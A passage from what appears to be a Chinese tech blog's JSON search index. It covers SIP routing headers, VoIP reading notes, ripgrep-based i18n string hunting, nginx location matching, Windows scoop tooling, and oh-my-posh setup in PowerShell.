(AOR) is a SIP or SIPS URI that points to a domain with a location service that can map the URI to another URI where the user might be available. Typically, the location service is populated through registrations. An AOR is frequently thought of as the \u0026ldquo;public address\u0026rdquo; of the user. \u0026ndash; rfc3261\nThe difference between a contact address and an address-of-record is like the difference between a device and its user. While there is no formal distinction in the syntax of these two forms of addresses, contact addresses are associated with a particular device, and may have a very device-specific form (like sip:10.0.0.1, or sip:edgar@ua21.example.com). An address-of-record, however, represents an identity of the user, generally a long-term identity, and it does not have a dependency on any device; users can move between devices or even be associated with multiple devices at one time while retaining the same address-of-record. A simple URI, generally of the form \u0026lsquo;sip:egdar@example.com\u0026rsquo;, is used for an address-of-record. \u0026ndash;rfc3764\n1. Record-route写法 u1 -\u0026gt; p1 -\u0026gt; p2 -\u0026gt; p3 -\u0026gt; p4,\n最后经过的排在最上面或者最前面。\n多行写法\nINVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p4.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p3.middle.com\u0026gt; Record-Route: \u0026lt;sip:p2.example.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; Record-Route记录的是从主叫到被叫的过程,其中Record-Route的顺序非常重要。因为这个顺序会影响Route字段的顺序。\n因为loose_route是从最上面的route字段来决定下一条的地址。\n所以,对于主叫来说,route的顺序和Record-Router相反。对于被叫来说,route字段和Record-Route字段相同。\n对于某些使用不同协议对接的不同代理的时候,会一次性的增加两次Record-Route。\n例如下面的,AB直接是tcp的,BC之间是udp的。那么INVITE从A到C之后,会在最上面增加两个。 A \u0026ndash;tcp\u0026ndash; B \u0026ndash;udp\u0026ndash; C\nRecord-Route: \u0026lt;sip:B_ip;transport=udp\u0026gt; Record-Route: \u0026lt;sip:B_ip;transport=tcp\u0026gt; 单行写法\nINVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p4.domain.com;lr\u0026gt;,\u0026lt;sip:p3.middle.com\u0026gt;,\u0026lt;sip:p2.example.com;lr\u0026gt;,\u0026lt;sip:p1.example.com;lr\u0026gt; 2. Via 写法 最新的排在最上面 ","permalink":"https://wdd.js.org/opensips/ch1/via-route-record-route/","summary":"sequenceDiagram title French Words I Know autonumber participant a participant p1 participant p2 participant p3 participant b a-\u003e\u003ep1 : INVITE route: p1, via: a p1-\u003e\u003ep2: INVITE via: a,p1, rr: p1 p2-\u003e\u003ep3: INVITE via: a,p1,p2 rr: p1,p2 p3-\u003e\u003eb: INVITE via: a,p1,p2,p3 rr: p1,p2,p3 b--\u003e\u003ep3: 180 via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 180 via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 180 via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 180 via: a rr: p1,p2,p3 b--\u003e\u003ep3: 200 OK via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 200 Ok via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 200 Ok via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 200 Ok via: a rr: p1,p2,p3 a-\u003e\u003ep1 : ACK via: a, route: p1,p2,p3 p1-\u003e\u003ep2: ACK via: a,p1, route: p2,p3 p2-\u003e\u003ep3: ACK via: a,p1,p2 route: p3 p3-\u003e\u003eb: ACK via: a,p1,p2,p3 rr代表record-route头。","title":"Via route Record-Route的区别"},{"content":"SIP是VoIP的基石,相当于HTTP协议在Web服务器里的角色。如果你熟悉HTTP协议,那么你可以在SIP协议中找到许多和HTTP中熟悉的东西,例如请求头,请求体,响应码之类概念,这是因为SIP协议的设计,很大程度上参考了HTTP协议。\n如果想要学习VoIP,那么SIP协议是你务必掌握敲门砖。\n1. SIP组件 UAC: 例如sip终端,软电话,话机 UAS: sip服务器 UA: ua既可以当做uac也可以当做uas 代理服务器 重定向服务器 注册服务器 网关 PSTN 公共交换电话网 2. SBC 边界会话控制器 SBC是Session Border Controller的缩写,具有一下几个功能。\n拓扑隐藏:隐藏所有内部网络的信息。 媒体流管理:设置语音流编码规则,转换等 增加能力:例如Refer, 3CPP 维护NAT映射: 访问控制 媒体加密:例如外部网络用SRTP, 内部网络用RTP 3. sip注册过程 下面简化注册逻辑,省略了验证和过期等字段:\n对于分机来说,注册服务器的地址是需要设置的 分机向注册服务器发请求,说:你好,注册服务器,我是8005,我的地址是200.180.1.1,以后你可以用这个地址联系我。 注册服务器回复:好的,注册成功 4. sip服务器的类型 4.1. 代理服务器 4.2. 重定向服务器 4.3. 背靠背UA服务器 背靠背UA服务器有两个作用\n隐藏网络拓扑结构 有些时候,路由无法到达,只能用背靠背UA服务器 5. 常用sip请求方法 比较常用的是下面的\n常用的几个是:register, invite, ack, bye, cancel。除了cancel和ack不需要认证外,其余的请求都需要认证。 register自不必说,invite和bye是需要认证的。\n对于我们不信任的ua,我们不允许他们呼叫。对于未认证的bye,也需要禁止。后者可以防止恶意的bye请求,挂断正常的呼叫。\ninvite除了re-invite的情况,其余的都属于初始化请求,需要着重关心的。而对于bye这种序列化请求,只需要按照record-route去路由。\n6. sip响应状态码 7. sip对话流程图 从上图可以看出,从invite请求到200ok之间的信令,都经过了代理服务器。但是200ok之后的ack,确没有经过代理服务器,如果想要所有信令都经过代理服务器,需要在sip消息头record-routing 指定代理服务器的地址\n8. 请求与响应报文 9. 事务与对话的区别 重点:\n从INVITE请求到最终的响应(注意1xx不是最终响应,非1xx的都是最终响应)之间,称为事务。一个事务可以带有多个消息组成,并经过多个ua。 ack请求比较特殊,但是ack不是事务。如果被叫接通后,超时未收到主叫方的ack, 会怎样?是否会再次发送200OK tcp三次握手建立连接,sip:invite-\u0026gt;200ok-\u0026gt;ack,可以理解为三次握手建立对话。 bye请求和200ok算作一个事务 dialog建立的前提是呼叫接通,如果呼叫没有接通,则没有dialog。 dialog可以由三个元素唯一确定。callId, from字段中的tag, to字段中的tag。 10. sip底层协议 SIP协议的结构 SIP协议是一个分层的协议,意味着各层之间是相互独立的\n最底层:SIP编码的语法 BNF语法 第二层:传输层 传输层定义如何接收和发送消息,SIP常用的传输层可以是udp, tcp, websocket等等 第三层:事务层 事务是一个请求和最终的响应称为一个事务,例如invite, 200ok是一个事务 第四层:事务用户层 所有的SIP实体,除了无状态的代理,都称为事务用户层。常见的uac, uas都是事务用户层 11. voip总体架构 12. 参考 ","permalink":"https://wdd.js.org/opensips/ch1/sip-overview/","summary":"SIP是VoIP的基石,相当于HTTP协议在Web服务器里的角色。如果你熟悉HTTP协议,那么你可以在SIP协议中找到许多和HTTP中熟悉的东西,例如请求头,请求体,响应码之类概念,这是因为SIP协议的设计,很大程度上参考了HTTP协议。\n如果想要学习VoIP,那么SIP协议是你务必掌握敲门砖。\n1. SIP组件 UAC: 例如sip终端,软电话,话机 UAS: sip服务器 UA: ua既可以当做uac也可以当做uas 代理服务器 重定向服务器 注册服务器 网关 PSTN 公共交换电话网 2. SBC 边界会话控制器 SBC是Session Border Controller的缩写,具有一下几个功能。\n拓扑隐藏:隐藏所有内部网络的信息。 媒体流管理:设置语音流编码规则,转换等 增加能力:例如Refer, 3CPP 维护NAT映射: 访问控制 媒体加密:例如外部网络用SRTP, 内部网络用RTP 3. sip注册过程 下面简化注册逻辑,省略了验证和过期等字段:\n对于分机来说,注册服务器的地址是需要设置的 分机向注册服务器发请求,说:你好,注册服务器,我是8005,我的地址是200.180.1.1,以后你可以用这个地址联系我。 注册服务器回复:好的,注册成功 4. sip服务器的类型 4.1. 代理服务器 4.2. 重定向服务器 4.3. 背靠背UA服务器 背靠背UA服务器有两个作用\n隐藏网络拓扑结构 有些时候,路由无法到达,只能用背靠背UA服务器 5. 常用sip请求方法 比较常用的是下面的\n常用的几个是:register, invite, ack, bye, cancel。除了cancel和ack不需要认证外,其余的请求都需要认证。 register自不必说,invite和bye是需要认证的。\n对于我们不信任的ua,我们不允许他们呼叫。对于未认证的bye,也需要禁止。后者可以防止恶意的bye请求,挂断正常的呼叫。\ninvite除了re-invite的情况,其余的都属于初始化请求,需要着重关心的。而对于bye这种序列化请求,只需要按照record-route去路由。\n6. sip响应状态码 7. sip对话流程图 从上图可以看出,从invite请求到200ok之间的信令,都经过了代理服务器。但是200ok之后的ack,确没有经过代理服务器,如果想要所有信令都经过代理服务器,需要在sip消息头record-routing 指定代理服务器的地址\n8. 请求与响应报文 9. 事务与对话的区别 重点:\n从INVITE请求到最终的响应(注意1xx不是最终响应,非1xx的都是最终响应)之间,称为事务。一个事务可以带有多个消息组成,并经过多个ua。 ack请求比较特殊,但是ack不是事务。如果被叫接通后,超时未收到主叫方的ack, 会怎样?是否会再次发送200OK tcp三次握手建立连接,sip:invite-\u0026gt;200ok-\u0026gt;ack,可以理解为三次握手建立对话。 bye请求和200ok算作一个事务 dialog建立的前提是呼叫接通,如果呼叫没有接通,则没有dialog。 dialog可以由三个元素唯一确定。callId, from字段中的tag, to字段中的tag。 10.","title":"SIP协议简介"},{"content":"1. 概念理解 务必要能理解SIP的重要概念,特别是事务、Dialog。参考https://www.yuque.com/wangdd/opensips/fx5pyy 概念是非常重要的东西,不理解概念,越学就会越吃力 2. 时序图 时序图是非常重要的,培训时,一般我会要求学员务必能够手工绘制时序图。因为只有能够手工绘制时序图了,在排查问题时,才能够从抓包工具给出的时序图中分析出问题所在。\nRFC3665 https://datatracker.ietf.org/doc/html/rfc3665 中提供了很多经典的时序图,建议可以去临摹。\n","permalink":"https://wdd.js.org/opensips/ch1/study-tips/","summary":"1. 概念理解 务必要能理解SIP的重要概念,特别是事务、Dialog。参考https://www.yuque.com/wangdd/opensips/fx5pyy 概念是非常重要的东西,不理解概念,越学就会越吃力 2. 时序图 时序图是非常重要的,培训时,一般我会要求学员务必能够手工绘制时序图。因为只有能够手工绘制时序图了,在排查问题时,才能够从抓包工具给出的时序图中分析出问题所在。\nRFC3665 https://datatracker.ietf.org/doc/html/rfc3665 中提供了很多经典的时序图,建议可以去临摹。","title":"学习建议"},{"content":" 书名 Packet Guide to Voip over IP 作者 Bruce Hartpence 状态 已读完 简介 Go under the hood of an operating Voice over IP network, and build your knowledge of protocol \u0026hellip;. 读后感 新技术出现的时机 Pulling the trigger early might put you at risk of making the wrong decision in terms of vendor or protocol. Adopting late might put you behind the competition or make you rush to deploy a system that is not well understood by the local staff.\n技术应用出现的太早则会承受巨大的风险,出现的太晚则失去竞争力。\n两种SIP信令 VoIP protocols are broken into two categories: signaling and transport.\nVoIP的信令可以分为两类,传输信令 与 传输媒体\n美梦与噩梦 It was a golden dream for some (consumers) and a nightmare for others; namely, the providers.\n新技术的出现,对开拓者来说是黄金美梦,对守旧者来说,则是噩梦。\n出局 Some of these services offered calling plans for less than half the price of traditional carriers. Some of them, most notably Skype, had as one of their goals putting telephone companies out of business\nUDP的另一种理解 In fact,UDP is sometimes considered a fire-and-forget protocol because once the packet leaves the sender, we think nothing more about it.\nUDP可以理解成一种一旦发送,则忘记的协议。\n","permalink":"https://wdd.js.org/posts/2022/07/vl3zhk/","summary":"书名 Packet Guide to Voip over IP 作者 Bruce Hartpence 状态 已读完 简介 Go under the hood of an operating Voice over IP network, and build your knowledge of protocol \u0026hellip;. 读后感 新技术出现的时机 Pulling the trigger early might put you at risk of making the wrong decision in terms of vendor or protocol. Adopting late might put you behind the competition or make you rush to deploy a system that is not well understood by the local staff.","title":"读书笔记 - Packet Guide to VoIP"},{"content":"1. 前提说明 项目已经处于维护期 项目一开始并没有考虑多语言,所以很多地方都是写死的中文 现在要给这个项目添加多语言适配 2. 工具选择 https://www.npmjs.com/package/i18n https://www.npmjs.com/package/vue-i18n 3. 难点 项目很大,中文可能存在于各种文件中,例如html, vue, js, typescript等等, 人工查找不现实 所以首先第一步是要找出所有的中文语句 4. 让文本飞 安装ripgrep apt-get instal ripgrep 搜索所有包含中文的代码: rg -e '[\\p{Han}]' \u0026gt; han.all.md 给所有包含中文的代码,按照文件名,和出现的次数排序: cat han.all.md | awk -F: '{print $1}' | uniq -c | sort -nr \u0026gt; stat.han.md 这一步主要是看看哪些文件包含的中文比较多 按照中文的语句,排序并统计出现的次数: cat han.all.md |rg -o -e '([\\p{Han}]+)' | sort | uniq -c | sort -nr \u0026gt; word.han.md 经过上面4步,基本上可以定位出哪些代码中包含中文,中文的语句有哪些。\n","permalink":"https://wdd.js.org/posts/2022/07/mv0hk1/","summary":"1. 前提说明 项目已经处于维护期 项目一开始并没有考虑多语言,所以很多地方都是写死的中文 现在要给这个项目添加多语言适配 2. 工具选择 https://www.npmjs.com/package/i18n https://www.npmjs.com/package/vue-i18n 3. 难点 项目很大,中文可能存在于各种文件中,例如html, vue, js, typescript等等, 人工查找不现实 所以首先第一步是要找出所有的中文语句 4. 让文本飞 安装ripgrep apt-get instal ripgrep 搜索所有包含中文的代码: rg -e '[\\p{Han}]' \u0026gt; han.all.md 给所有包含中文的代码,按照文件名,和出现的次数排序: cat han.all.md | awk -F: '{print $1}' | uniq -c | sort -nr \u0026gt; stat.han.md 这一步主要是看看哪些文件包含的中文比较多 按照中文的语句,排序并统计出现的次数: cat han.all.md |rg -o -e '([\\p{Han}]+)' | sort | uniq -c | sort -nr \u0026gt; word.han.md 经过上面4步,基本上可以定位出哪些代码中包含中文,中文的语句有哪些。","title":"中途多语言适配"},{"content":" 1. 我为什么会知道0 A.D. 这款游戏? 最近切换到windows开发,用了scoop这个包管理工具来安装软件,随便逛逛的时候,发现scoop还可以用来安装游戏,然后我就在里面看了一下,然后排名第一的是一个名叫 0 A.D.的游戏,然后我就安装,并试玩了一下。\n2. 0 A.D. 这个名字是啥意思? 基督教称耶稣诞生的那年为公元元年, A.D. 就是Anno Domini(A.D.)(拉丁)的缩写,对应的公元前就是而在耶稣诞生之前,称为B.C. Before Christ(B.C.).\n我们现在的阳历,例如今年是2022年,这其实就是公元2022年。对应的公元元年,对中国来说,大致在西汉年间。\n所以 0 A.D. 其实的意思就是一个不存在的元年。\n“0 A.D.” is a time period that never actually existed:\n3. 0 A.D. 是什么类型的游戏? 如果你玩过红警,0 A.D.的有点像红警。 官方的介绍0AD是一个基于历史的实时策略游戏。 如果你玩过部落冲突,0AD其实也有点类似部落冲突。\n4. 0 A.D. 有什么特点? 跨平台, windows, mac, linux都可以玩 免费 历史悠久,项目开始于2001 还处于开发阶段 可玩性还不错 基于真实历史,所以玩游戏的时候,也是能够学点历史的。里面有是14个文明。 5. 有哪些玩法 单机和AI对战 在线组队玩 6. FAQ 如何设置中文界面 默认的游戏不带中文语言的,实际上它是有中文的语言包的,可以参考 参考 https://baike.baidu.com/item/%E5%85%AC%E5%85%83/17855 ","permalink":"https://wdd.js.org/posts/2022/07/gxog1n/","summary":" 1. 我为什么会知道0 A.D. 这款游戏? 最近切换到windows开发,用了scoop这个包管理工具来安装软件,随便逛逛的时候,发现scoop还可以用来安装游戏,然后我就在里面看了一下,然后排名第一的是一个名叫 0 A.D.的游戏,然后我就安装,并试玩了一下。\n2. 0 A.D. 这个名字是啥意思? 基督教称耶稣诞生的那年为公元元年, A.D. 就是Anno Domini(A.D.)(拉丁)的缩写,对应的公元前就是而在耶稣诞生之前,称为B.C. Before Christ(B.C.).\n我们现在的阳历,例如今年是2022年,这其实就是公元2022年。对应的公元元年,对中国来说,大致在西汉年间。\n所以 0 A.D. 其实的意思就是一个不存在的元年。\n“0 A.D.” is a time period that never actually existed:\n3. 0 A.D. 是什么类型的游戏? 如果你玩过红警,0 A.D.的有点像红警。 官方的介绍0AD是一个基于历史的实时策略游戏。 如果你玩过部落冲突,0AD其实也有点类似部落冲突。\n4. 0 A.D. 有什么特点? 跨平台, windows, mac, linux都可以玩 免费 历史悠久,项目开始于2001 还处于开发阶段 可玩性还不错 基于真实历史,所以玩游戏的时候,也是能够学点历史的。里面有是14个文明。 5. 有哪些玩法 单机和AI对战 在线组队玩 6. FAQ 如何设置中文界面 默认的游戏不带中文语言的,实际上它是有中文的语言包的,可以参考 参考 https://baike.baidu.com/item/%E5%85%AC%E5%85%83/17855 ","title":"0 A.D. 一款开发了21年还未release的游戏"},{"content":"HTTP URL的格式复习 ://:@:/;?#frag\nscheme 协议, 常见的有http, https, file, ftp等 : 用户名和密码 host 主机或者IP port 端口号 path 路径 params 参数 用的比较少 query 查询参数 frag 片段,资源的一部分,浏览器不会把这部分发给服务端 关于frag片段 浏览器加载一个网页,网页可能有很多章节的内容,frag片段可以告诉浏览器,应该将某个特定的点显示在浏览器中。\n例如 https://github.com/wangduanduan/jsplumb-chinese-tutorial/blob/master/api/anchors.js#L18\n这里的#L8就是一个frag片段, 当浏览器打开这个页面的时,就会跳到对应的行\n在网络面板,也可以看到,实际上浏览器发出的请求,也没有带有frag参数\nVue 在Vue中,默认的路由就是这种frag片段。 这种路由只对浏览器有效,并不会发送到服务端。\n所以在一个单页应用中,服务端是无法根据URL知道用户访问的是什么页面的。\n所以实际上nginx无法根据frag片段进行拦截。\nnginx路径拦截 location [modifier] [URI] { ... ... } modifier\n= 完全匹配 ^~ 正则匹配,并且必须是以特定的URL开头 ~ 正则匹配,且大小写敏感 ~* 正则匹配,大小写不敏感 nginx路径匹配规则\n首先使完全匹配,一旦匹配,则匹配结束,进行后续数据处理 完全匹配无法找到,则进行最长URL匹配,类似 ^~ 最长匹配找不到,则按照 ~或者~*的方式匹配 最后按照 / 的默认匹配 ","permalink":"https://wdd.js.org/posts/2022/07/gt6a84/","summary":"HTTP URL的格式复习 ://:@:/;?#frag\nscheme 协议, 常见的有http, https, file, ftp等 : 用户名和密码 host 主机或者IP port 端口号 path 路径 params 参数 用的比较少 query 查询参数 frag 片段,资源的一部分,浏览器不会把这部分发给服务端 关于frag片段 浏览器加载一个网页,网页可能有很多章节的内容,frag片段可以告诉浏览器,应该将某个特定的点显示在浏览器中。\n例如 https://github.com/wangduanduan/jsplumb-chinese-tutorial/blob/master/api/anchors.js#L18\n这里的#L8就是一个frag片段, 当浏览器打开这个页面的时,就会跳到对应的行\n在网络面板,也可以看到,实际上浏览器发出的请求,也没有带有frag参数\nVue 在Vue中,默认的路由就是这种frag片段。 这种路由只对浏览器有效,并不会发送到服务端。\n所以在一个单页应用中,服务端是无法根据URL知道用户访问的是什么页面的。\n所以实际上nginx无法根据frag片段进行拦截。\nnginx路径拦截 location [modifier] [URI] { ... ... } modifier\n= 完全匹配 ^~ 正则匹配,并且必须是以特定的URL开头 ~ 正则匹配,且大小写敏感 ~* 正则匹配,大小写不敏感 nginx路径匹配规则\n首先使完全匹配,一旦匹配,则匹配结束,进行后续数据处理 完全匹配无法找到,则进行最长URL匹配,类似 ^~ 最长匹配找不到,则按照 ~或者~*的方式匹配 最后按照 / 的默认匹配 ","title":"请问nginx 能否根据 frag 片段 进行路径转发?"},{"content":"我已经有5年没有用过windows了,再次在windows上搞开发,发现了windows对于开发者来说,友好了不少。\n首先是windows terminal, 这个终端做的还不错。\n其次是一些常用的命令,比如说ssh, scp等,都已经默认附带了,不用再安装。\n还有包管理工具scoop, 命令行提示工具 oh-my-posh, 以及powershell 7 加载一起,基本可以迁移80%左右的linux上的开发环境。\n特别要说明一下scoop, 这个包管理工具,我安装了在linux上常用的一些软件。\n包括有以下的软件,而且软件的版本都还蛮新的。\n0ad 0.0.25b games 7zip 22.00 main curl 7.84.0_4 main curlie 1.6.9 main diff-so-fancy 1.4.3 main duf 0.8.1 main everything gawk 5.1.1 main git 2.37.0.windows.1 main git-aliases 0.3.5 extras git-chglog 0.15.1 main gzip 1.3.12 main hostctl 1.1.2 main hugo 0.101.0 main jq 1.6 main klogg 22.06.0.1289 extras make 4.3 main neofetch 7.1.0 main neovim 0.7.2 main netcat 1.12 main nodejs-lts 16.16.0 main ntop 0.3.4 main procs 0.12.3 main ripgrep 13.0.0 main sudo 0.2020.01.26 main tar 1.23 main 另外一个就是powershell 7了,贴下我的profile配置。\n智能提示,readline都有了\noh-my-posh init pwsh --config ~/default.omp.json | Invoke-Expression Import-Module PSReadLine New-Alias -Name ll -Value ls if ($host.Name -eq \u0026#39;ConsoleHost\u0026#39;) { Import-Module PSReadLine Set-PSReadLineOption -EditMode Emacs } ","permalink":"https://wdd.js.org/posts/2022/07/crofgr/","summary":"我已经有5年没有用过windows了,再次在windows上搞开发,发现了windows对于开发者来说,友好了不少。\n首先是windows terminal, 这个终端做的还不错。\n其次是一些常用的命令,比如说ssh, scp等,都已经默认附带了,不用再安装。\n还有包管理工具scoop, 命令行提示工具 oh-my-posh, 以及powershell 7 加载一起,基本可以迁移80%左右的linux上的开发环境。\n特别要说明一下scoop, 这个包管理工具,我安装了在linux上常用的一些软件。\n包括有以下的软件,而且软件的版本都还蛮新的。\n0ad 0.0.25b games 7zip 22.00 main curl 7.84.0_4 main curlie 1.6.9 main diff-so-fancy 1.4.3 main duf 0.8.1 main everything gawk 5.1.1 main git 2.37.0.windows.1 main git-aliases 0.3.5 extras git-chglog 0.15.1 main gzip 1.3.12 main hostctl 1.1.2 main hugo 0.101.0 main jq 1.6 main klogg 22.06.0.1289 extras make 4.3 main neofetch 7.1.0 main neovim 0.7.2 main netcat 1.","title":"windows 上的命令行体验"},{"content":"每次打开新的标签页,Powershell 都会输出下面的代码\nLoading personal and system profiles took 3566ms. 时间不固定,有时1s到10s都可能有,时间不固定。 这个加载速度是非常慢的。\n然后我打开一个非oh-my-posh的窗口,输入\noh-my-posh debug 看到其中几行日志:\n2022/07/09 12:20:23 error: HTTPRequest Get \u0026#34;https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json\u0026#34;: context deadline exceeded 2022/07/09 12:20:23 HTTPRequest duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 downloadConfig duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 resolveConfigPath duration: 5.0072715s, args: 2022/07/09 12:20:23 Init duration: 5.0072715s, args: 好家伙,原来每次启动,oh-my-posh还去github上下载了一个文件。\n因为下载文件而拖慢了整个启动过程。\n然后在github issue上倒找:https://github.com/JanDeDobbeleer/oh-my-posh/issues/2251\noh-my-posh init pwsh \u0026ndash;config ~/default.omp.json\n其中关键一点是启动oh-my-posh的时候,如果不用\u0026ndash;config配置默认的文件,oh-my-posh就回去下载默认的配置文件。\n所以问题就好解决了。\n首先下载https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 这个文件,然后再保存到用户的家目录里面。\n然后打开terminal, 输入: code $profile\n前提是你的电脑上要装过vscode, 然后给默认的profile加上\u0026ndash;config参数,试了一下,问题解决。\noh-my-posh init pwsh --config ~/default.omp.json | Invoke-Expression Import-Module PSReadLine New-Alias -Name ll -Value ls if ($host.Name -eq \u0026#39;ConsoleHost\u0026#39;) { Import-Module PSReadLine Set-PSReadLineOption -EditMode Emacs } ","permalink":"https://wdd.js.org/posts/2022/07/igur01/","summary":"每次打开新的标签页,Powershell 都会输出下面的代码\nLoading personal and system profiles took 3566ms. 时间不固定,有时1s到10s都可能有,时间不固定。 这个加载速度是非常慢的。\n然后我打开一个非oh-my-posh的窗口,输入\noh-my-posh debug 看到其中几行日志:\n2022/07/09 12:20:23 error: HTTPRequest Get \u0026#34;https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json\u0026#34;: context deadline exceeded 2022/07/09 12:20:23 HTTPRequest duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 downloadConfig duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 resolveConfigPath duration: 5.0072715s, args: 2022/07/09 12:20:23 Init duration: 5.0072715s, args: 好家伙,原来每次启动,oh-my-posh还去github上下载了一个文件。\n因为下载文件而拖慢了整个启动过程。\n然后在github issue上倒找:https://github.com/JanDeDobbeleer/oh-my-posh/issues/2251\noh-my-posh init pwsh \u0026ndash;config ~/default.omp.json\n其中关键一点是启动oh-my-posh的时候,如果不用\u0026ndash;config配置默认的文件,oh-my-posh就回去下载默认的配置文件。\n所以问题就好解决了。\n首先下载https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 这个文件,然后再保存到用户的家目录里面。\n然后打开terminal, 输入: code $profile\n前提是你的电脑上要装过vscode, 然后给默认的profile加上\u0026ndash;config参数,试了一下,问题解决。\noh-my-posh init pwsh --config ~/default.","title":"powershell oh-my-posh 加载数据太慢"},{"content":"0. 前提条件 系统是windows11 已经安装过powershell 7 安装过vscode编辑器 默认情况下,所有命令均在powershell下执行的 1. 安装 oh my posh 1.2 方式1: 通过代理安装 假如你有socks代理,那么可以用winget安装\n打开你的power shell 执行类似下面的命令,来配置代理\n$env:all_proxy=\u0026#34;socks5://127.0.0.1:1081\u0026#34; 如果没有socks代理,最好不要用winget安装,因为速度太慢。然后执行:\nwinget install JanDeDobbeleer.OhMyPosh -s winget 1.2 方式2: 下载exe,手工安装 再oh-my-posh的release界面 https://github.com/JanDeDobbeleer/oh-my-posh/releases\n可以看到很多版本的文件,windows选择install-amd64.exe, 下载完了之后手工点击执行来安装。\nhttps://github.com/JanDeDobbeleer/oh-my-posh/releases/download/v8.13.1/install-amd64.exe\n2. 配置 oh-my-posh 在powershell中执行下面的命令,vscode回打开对应的文件。\ncode $PROFILE 在文件中粘贴如下的内容:\noh-my-posh init pwsh | Invoke-Expression 保存文件,然后再次打开windows termial, 输入下面的命令来reload profile\n. $PROFILE 然后你可以看到终端出现了提示符,有可能有点卡,第一次是有点慢的。但是很多符号可能是乱码,因为是没有配置相关的字体。\n3. 字体配置 3.1 安装字体 下载文件 https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip 解压文件 打开设置,在个性化》字体中,将之前下载好的所有字体,拖动到下面的红框中,字体就会自动安装 3.2 windows termial字体配置 用vscode打开对windows termial的配置json文件,在profiles.default.font中配置如下字体\n\u0026#34;font\u0026#34;: { \u0026#34;face\u0026#34;: \u0026#34;MesloLGM NF\u0026#34; } 配置之后,需要重启windows termial\n3.3 vscode termial 配置 在vscode中输入 Open Sett, 就可以打开设置的json文件。\n在配置中设置如下的内容\n\u0026#34;terminal.integrated.fontFamily\u0026#34;: \u0026#34;MesloLGM NF\u0026#34;, 4. 效果展示 4.1 windows terminal 4.2 vscode terminal 5. 体验 优点 oh-my-posh 总体还不错,能够方便的展示git相关的信息 缺点 性能拉跨,每次终端可能需要0.5s到2s之间的延迟卡顿,相比于linux上的shell要慢不少 6. 参考文献 https://ohmyposh.dev/docs/installation/prompt ","permalink":"https://wdd.js.org/posts/2022/07/ssgb9f/","summary":"0. 前提条件 系统是windows11 已经安装过powershell 7 安装过vscode编辑器 默认情况下,所有命令均在powershell下执行的 1. 安装 oh my posh 1.2 方式1: 通过代理安装 假如你有socks代理,那么可以用winget安装\n打开你的power shell 执行类似下面的命令,来配置代理\n$env:all_proxy=\u0026#34;socks5://127.0.0.1:1081\u0026#34; 如果没有socks代理,最好不要用winget安装,因为速度太慢。然后执行:\nwinget install JanDeDobbeleer.OhMyPosh -s winget 1.2 方式2: 下载exe,手工安装 再oh-my-posh的release界面 https://github.com/JanDeDobbeleer/oh-my-posh/releases\n可以看到很多版本的文件,windows选择install-amd64.exe, 下载完了之后手工点击执行来安装。\nhttps://github.com/JanDeDobbeleer/oh-my-posh/releases/download/v8.13.1/install-amd64.exe\n2. 配置 oh-my-posh 在powershell中执行下面的命令,vscode回打开对应的文件。\ncode $PROFILE 在文件中粘贴如下的内容:\noh-my-posh init pwsh | Invoke-Expression 保存文件,然后再次打开windows termial, 输入下面的命令来reload profile\n. $PROFILE 然后你可以看到终端出现了提示符,有可能有点卡,第一次是有点慢的。但是很多符号可能是乱码,因为是没有配置相关的字体。\n3. 字体配置 3.1 安装字体 下载文件 https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip 解压文件 打开设置,在个性化》字体中,将之前下载好的所有字体,拖动到下面的红框中,字体就会自动安装 3.2 windows termial字体配置 用vscode打开对windows termial的配置json文件,在profiles.default.font中配置如下字体\n\u0026#34;font\u0026#34;: { \u0026#34;face\u0026#34;: \u0026#34;MesloLGM NF\u0026#34; } 配置之后,需要重启windows termial","title":"windows11 安装 oh my posh"},{"content":"自从我换了新款的惠普战X之后,我的老搭档,2017款的macbook pro, 已经在沙发上躺了很久了。\n我拍了拍它的脑袋,对它语重心长的说: 人不能闲着,闲着容易生病,笔记本也是如此。虽然你已经是5年前的mbp了, 但是廉颇老矣,尚能饭否?\nmbp面无表情,胡子邋遢,朝我瞥了一眼,像是嘲讽,又像是不满,一口气吸掉还剩一点的香烟,有气无力的说:我已经工作五年了,按照国家的法律规定,已经到了退休的年龄,是该享受享受了。\n我\n","permalink":"https://wdd.js.org/posts/2022/07/guv65u/","summary":"自从我换了新款的惠普战X之后,我的老搭档,2017款的macbook pro, 已经在沙发上躺了很久了。\n我拍了拍它的脑袋,对它语重心长的说: 人不能闲着,闲着容易生病,笔记本也是如此。虽然你已经是5年前的mbp了, 